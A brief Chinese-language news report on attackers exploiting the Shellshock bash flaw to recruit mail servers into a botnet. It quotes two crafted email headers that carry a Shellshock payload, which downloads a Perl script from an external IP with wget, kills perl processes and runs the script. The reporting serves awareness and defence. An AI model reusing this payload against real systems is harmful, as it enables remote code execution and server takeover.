攻击者正利用上个月披露的 Shellshock 漏洞入侵邮件服务器建立僵尸网络。Shellshock 漏洞是指攻击者向使用 bash 的 Unix/Linux 服务器发送精心构造的请求,诱骗 bash 远程执行命令。安全研究人员报告,攻击者向邮件服务器发送特定的消息头字段,诱骗服务器执行一个 Perl 脚本,成为僵尸网络的一部分。邮件消息头的构成是:
Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend